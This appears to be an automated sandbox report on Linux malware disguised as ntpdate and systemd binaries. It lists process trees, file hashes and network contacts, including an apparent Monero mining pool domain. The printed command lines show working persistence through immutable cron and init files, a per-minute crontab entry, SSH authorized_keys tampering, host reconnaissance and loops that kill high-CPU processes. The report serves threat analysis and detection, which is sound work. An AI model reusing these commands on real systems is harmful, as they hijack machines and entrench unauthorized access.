File opened for modification /etc/init.d/ntpdate /usr/bin/tee N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/bsysde /bin/cp N/A
File opened for modification /sbin/entpdate /usr/bin/tee N/A
File opened for modification /sbin/bsysdl /bin/cp N/A
File opened for modification /sbin/lntpdate /usr/bin/tee N/A
File opened for modification /sbin/binitd /bin/cp N/A
File opened for modification /sbin/bcrond /bin/cp N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/ntpdate N/A

Processes

/tmp/.systemd/ntpdate

[/tmp/.systemd/ntpdate]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/bin/mkdir

[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]

/usr/bin/chattr

[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]

/bin/rm

[rm -rf /sbin/bcrond]

/bin/cp

[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bcrond]

/usr/bin/tee

[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]

/bin/chmod

[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr -a -i /sbin/bsysd]

/bin/rm

[rm -rf /sbin/bsysd]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/entpdate /sbin/bsysde]

/bin/rm

[rm -rf /sbin/bsysde]

/bin/cp

[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bsysde]

/usr/bin/tee

[tee -a /sbin/entpdate]

/bin/chmod

[chmod +x /sbin/entpdate]

/usr/bin/chattr

[chattr +i +a /sbin/entpdate /sbin/bsysde]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/lntpdate /sbin/bsysdl]

/bin/rm

[rm -rf /sbin/bsysdl]

/bin/cp

[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bsysdl]

/usr/bin/tee

[tee -a /sbin/lntpdate]

/bin/chmod

[chmod +x /sbin/lntpdate]

/usr/bin/chattr

[chattr +i +a /sbin/lntpdate /sbin/bsysdl]

/usr/bin/which

[which update-rc.d]

/usr/bin/chattr

[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]

/bin/rm

[rm -rf /sbin/binitd]

/bin/cp

[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/binitd]

/usr/bin/tee

[tee -a /etc/init.d/ntpdate]

/bin/chmod

[chmod +x /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/chattr

[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/which

[which chkconfig]

Network

Country Destination Domain Proto
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
N/A 224.0.0.251:5353 udp
GB 89.187.167.3:443 tcp

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/sbin/bcrond

MD5 92dc30d449f563a5bdbba08d4a9d57fc
SHA1 ff609eed2df786396203a8806400566df079cc7f
SHA256 86db0330a233efe6e11f944833f9e9b7472d7f34595cf693f001d99df641513b
SHA512 573fa375ddcb6a49690f5168d791af2529a89233d3bf0ff50c2b88686c27e4cef59432e0f6ae71745fecfa2657c23248ad33ea50ac8b9f1c96721f38e3325097

/etc/cron.d/ntpdate

MD5 755700d11d59e0daeb4f6452aee1ad5d
SHA1 6b1194921376bef9c7559629712772a11e78eaa4
SHA256 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00
SHA512 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7

/sbin/entpdate

MD5 4aeb6335d69473274691f59dc2096cfe
SHA1 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc
SHA256 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785
SHA512 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c

/sbin/lntpdate

MD5 3748e897538baafbc7b260b4d2fbc98f
SHA1 41d179e3cfc4c1820ea2c0fed0d50009564db79b
SHA256 ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7
SHA512 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea

/etc/init.d/ntpdate

MD5 bd99a962d94b5b4c32f8b7c8ca1f9ea9
SHA1 af33dc04d1f16e5ccceb2c0569b26e45bb65b32b
SHA256 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28
SHA512 fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

149s

Max time network

134s

Command Line

[/tmp/.update/.i686]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/.update/.i686 N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.6m5OSD /usr/bin/crontab N/A

Enumerates running processes

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/.update/.i686 N/A

Security Software Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/grep N/A
File opened for reading /proc/cpuinfo /usr/bin/grep N/A
File opened for reading /proc/cpuinfo /tmp/.update/.i686 N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/cpu/types /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/.update/.i686 N/A
File opened for reading /sys/bus/dax/devices/target_node /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/node/online /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/dax/target_node /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/.update/.i686 N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/.update/.i686 N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/.update/.i686 N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/.update/.i686 N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/.update/.i686 N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/.update/.i686 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/.update/.i686 N/A
File opened for reading /sys/bus/dax/devices /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/.update/.i686 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/.update/.i686 N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/.update/.i686 N/A

Process Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/ps N/A
N/A N/A /usr/bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/565/stat /usr/bin/ps N/A
File opened for reading /proc/787/cmdline /usr/bin/ps N/A
File opened for reading /proc/15/status /usr/bin/ps N/A
File opened for reading /proc/455/stat /usr/bin/ps N/A
File opened for reading /proc/85/status /usr/bin/ps N/A
File opened for reading /proc/89/stat /usr/bin/ps N/A
File opened for reading /proc/495/stat /usr/bin/ps N/A
File opened for reading /proc/444/stat /usr/bin/ps N/A
File opened for reading /proc/962/status /usr/bin/ps N/A
File opened for reading /proc/1342/status /usr/bin/ps N/A
File opened for reading /proc/87/status /usr/bin/ps N/A
File opened for reading /proc/175/stat /usr/bin/ps N/A
File opened for reading /proc/3/stat /usr/bin/ps N/A
File opened for reading /proc/1349/status /usr/bin/ps N/A
File opened for reading /proc/443/cmdline /usr/bin/ps N/A
File opened for reading /proc/20/cmdline /usr/bin/ps N/A
File opened for reading /proc/558/stat /usr/bin/ps N/A
File opened for reading /proc/1349/cmdline /usr/bin/ps N/A
File opened for reading /proc/3/stat /usr/bin/ps N/A
File opened for reading /proc/1328/cmdline /usr/bin/ps N/A
File opened for reading /proc/79/status /usr/bin/ps N/A
File opened for reading /proc/169/status /usr/bin/ps N/A
File opened for reading /proc/1068/status /usr/bin/ps N/A
File opened for reading /proc/87/status /usr/bin/ps N/A
File opened for reading /proc/23/stat /usr/bin/ps N/A
File opened for reading /proc/91/cmdline /usr/bin/ps N/A
File opened for reading /proc/1068/stat /usr/bin/ps N/A
File opened for reading /proc/1333/stat /usr/bin/ps N/A
File opened for reading /proc/164/status /usr/bin/ps N/A
File opened for reading /proc/457/status /usr/bin/ps N/A
File opened for reading /proc/1039/status /usr/bin/ps N/A
File opened for reading /proc/1397/stat /usr/bin/ps N/A
File opened for reading /proc/7/status /usr/bin/ps N/A
File opened for reading /proc/1398/stat /usr/bin/ps N/A
File opened for reading /proc/868/stat /usr/bin/ps N/A
File opened for reading /proc/500/status /usr/bin/ps N/A
File opened for reading /proc/558/stat /usr/bin/ps N/A
File opened for reading /proc/1138/status /usr/bin/ps N/A
File opened for reading /proc/169/stat /usr/bin/ps N/A
File opened for reading /proc/693/status /usr/bin/ps N/A
File opened for reading /proc/876/status /usr/bin/ps N/A
File opened for reading /proc/91/stat /usr/bin/ps N/A
File opened for reading /proc/1097/stat /usr/bin/ps N/A
File opened for reading /proc/90/cmdline /usr/bin/ps N/A
File opened for reading /proc/813/stat /usr/bin/ps N/A
File opened for reading /proc/159/cmdline /usr/bin/ps N/A
File opened for reading /proc/1465/cmdline /usr/bin/ps N/A
File opened for reading /proc/159/stat /usr/bin/ps N/A
File opened for reading /proc/444/stat /usr/bin/ps N/A
File opened for reading /proc/962/cmdline /usr/bin/ps N/A
File opened for reading /proc/159/stat /usr/bin/ps N/A
File opened for reading /proc/676/status /usr/bin/ps N/A
File opened for reading /proc/20/stat /usr/bin/ps N/A
File opened for reading /proc/86/status /usr/bin/ps N/A
File opened for reading /proc/681/status /usr/bin/ps N/A
File opened for reading /proc/171/stat /usr/bin/ps N/A
File opened for reading /proc/272/status /usr/bin/ps N/A
File opened for reading /proc/77/cmdline /usr/bin/ps N/A
File opened for reading /proc/693/cmdline /usr/bin/ps N/A
File opened for reading /proc/1162/status /usr/bin/ps N/A
File opened for reading /proc/22/stat /usr/bin/ps N/A
File opened for reading /proc/1366/status /usr/bin/ps N/A
File opened for reading /proc/1097/cmdline /usr/bin/ps N/A
File opened for reading /proc/1336/cmdline /usr/bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/.cron /bin/sh N/A
File opened for modification /tmp/.lock /tmp/.update/.i686 N/A

Processes

/tmp/.update/.i686

[/tmp/.update/.i686]

/bin/sh

[sh -c echo "[$(hostname=$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo $hostname | awk {'print $1'} 2>/dev/null)$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print "-"$2'} 2>/dev/null)][$(whoami 2>/dev/null)][$(hostname 2>/dev/null)][$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][$(X=$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/$//' 2>/dev/null); if [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ $(echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'AMD' ]; then echo $X 2>/dev/null | awk {'print $2" "$3" "$4'} 2>/dev/null; else echo $X 2>/dev/null; fi)]"]

/usr/bin/hostname

[hostname -I]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print "-"$2}]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep Port ]

/usr/bin/cat

[cat /etc/ssh/sshd_config]

/usr/bin/whoami

[whoami]

/usr/bin/hostname

[hostname]

/usr/bin/grep

[grep -c ^processor /proc/cpuinfo]

/usr/bin/sed

[sed -e s/$//]

/usr/bin/sed

[sed -e s/^ *//]

/usr/bin/cut

[cut -d: -f2]

/usr/bin/grep

[grep -m 1 model name /proc/cpuinfo]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $4}]

/usr/bin/awk

[awk {print $4}]

/bin/sh

[sh -c ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[$2]++ {print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]

/usr/bin/awk

[awk /[zZ]/ && !a[$2]++ {print $2}]

/usr/bin/ps

[ps -A -ostat,ppid]

/usr/bin/id

[id -u]

/usr/bin/grep

[grep -v grep]

/usr/bin/grep

[grep /etc/cron]

/usr/bin/ps

[ps x]

/bin/sh

[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]

/usr/bin/id

[id -u]

/usr/bin/awk

[awk {if($3>30.0) print $2}]

/usr/bin/grep

[grep -v /usr/sbin/httpd]

/usr/bin/grep

[grep -v -- -bash[[:space:]]*$]

/usr/bin/grep

[grep -v grep]

/usr/bin/ps

[ps aux]

/bin/sh

[sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.i686' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'/tmp/.update/.i686' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.i686$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null]

/usr/bin/rm

[rm -rf /tmp/.update/.cron]

/usr/bin/grep

[grep -v grep]

/usr/bin/crontab

[crontab -l]

/usr/bin/grep

[grep -v /tmp/.update/.i686]

/usr/bin/grep

[grep /tmp/.update/.i686$]

/usr/bin/grep

[grep -v grep]

/usr/bin/uniq

[uniq]

/usr/bin/crontab

[crontab -l]

/usr/bin/wc

[wc -l]

/usr/bin/sort

[sort]

/usr/bin/crontab

[crontab /tmp/.update/.cron]

/usr/bin/rm

[rm -rf /tmp/.update/.cron]

/bin/sh

[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi]

/usr/bin/id

[id -u]

/usr/bin/wc

[wc -l]

/usr/bin/awk

[awk {if($3>30.0) print $2}]

/usr/bin/grep

[grep -- -bash[[:space:]]*$]

/usr/bin/grep

[grep -v grep]

/usr/bin/ps

[ps aux]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 xmr-rx0.pwndns.pw udp
US 1.1.1.1:53 xmr-rx0.pwndns.pw udp
FR 51.210.15.231:80 xmr-rx0.pwndns.pw tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp

Files

/tmp/.update/.cron

MD5 9814e9c19a7304358742e3553bd73ea7
SHA1 88d43c112af907d972b1f1e2f49632f8ca004864
SHA256 9941b828f1984f2a85ba06f5eca0d7c22c9519cb8f09b43bf9930f6174f01b6d
SHA512 eb8ff6cd01f8100b78b579d732ec264976bc3378130b1535bea4553a8347cf445c5654adc58fea55341d9c22ad29872d5d9f85fd8bc6291bc449359ec4e34d9f

/var/spool/cron/crontabs/tmp.6m5OSD

MD5 964b07829b4f71b67d83a0ac24db1cab
SHA1 bf052205fa7870a5b2ebb4141a4bb604ccecf435
SHA256 af81703b357640390737fb2e4df7d99dfc26935fd0d454b53440a70c7b70333b
SHA512 d44502a0c0908f5aeb8f5899fe7c26232e2563d1ba72a26bf32d5973513afcd5c5af321b047d62d1d36c393385a7d285d59b91869535cf9c350075408d6aea1b

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240611-en

Max time kernel

2s

Command Line

[/tmp/.update/auth]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/.update/auth N/A
File opened for modification /home/user/.ssh/authorized_keys /tmp/.update/auth N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/authusers /tmp/.update/auth N/A

Processes

/tmp/.update/auth

[/tmp/.update/auth]

/bin/uname

[uname -n]

/bin/mkdir

[mkdir /root/.ssh]

/bin/chmod

[chmod 0700 /root/.ssh]

/bin/chmod

[chmod 0644 /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ai /root/.ssh /root/.ssh/authorized_keys]

/bin/rm

[rm -rf authusers]

/bin/grep

[grep -e /bin/sh -e /bin/bash]

/bin/cat

[cat /etc/passwd]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/usr/bin/chattr

[chattr -ai /root/.ssh /root/.ssh/authorized_keys]

/bin/sed

[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/bin/mkdir

[mkdir /home/user/.ssh]

/bin/chown

[chown -R user /home/user/.ssh]

Network

N/A

Files

/root/.ssh/authorized_keys

MD5 5841342e6d1bcae6dcfea6cc9326a684
SHA1 fea6d85939bb87ee27c30f670087ff0db740751c
SHA256 fb7dc97bdf7c5f4a74b2a0aa602a13c06ecadf99aeb1206dc86da38a7a75c6af
SHA512 116d63c20881320d0d76ab99300dbcf9146cf890d8b6c6c3769bc62cfbff88aba8d1d6d7ca0e39507a769251335251495e1246487fe8173f454e619535aadb33

/tmp/.update/authusers

MD5 9514cd886e4faf1f23baadfd967abcbd
SHA1 00894ed21cee494a192e94a782ae265e45d828f1
SHA256 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432
SHA512 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6

/tmp/.update/authusers

MD5 fe065880cc6e0333e8679d0e03ff2369
SHA1 aaceb9f893c93f47ddccca1e2e502c01ecbc5456
SHA256 f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77
SHA512 ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsel-20240611-en

Max time kernel

2s

Command Line

[/tmp/.systemd/.run]

Signatures

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/79/status /bin/ps N/A
File opened for reading /proc/sys/kernel/osrelease /bin/ps N/A
File opened for reading /proc/317/cmdline /bin/ps N/A
File opened for reading /proc/167/stat /bin/ps N/A
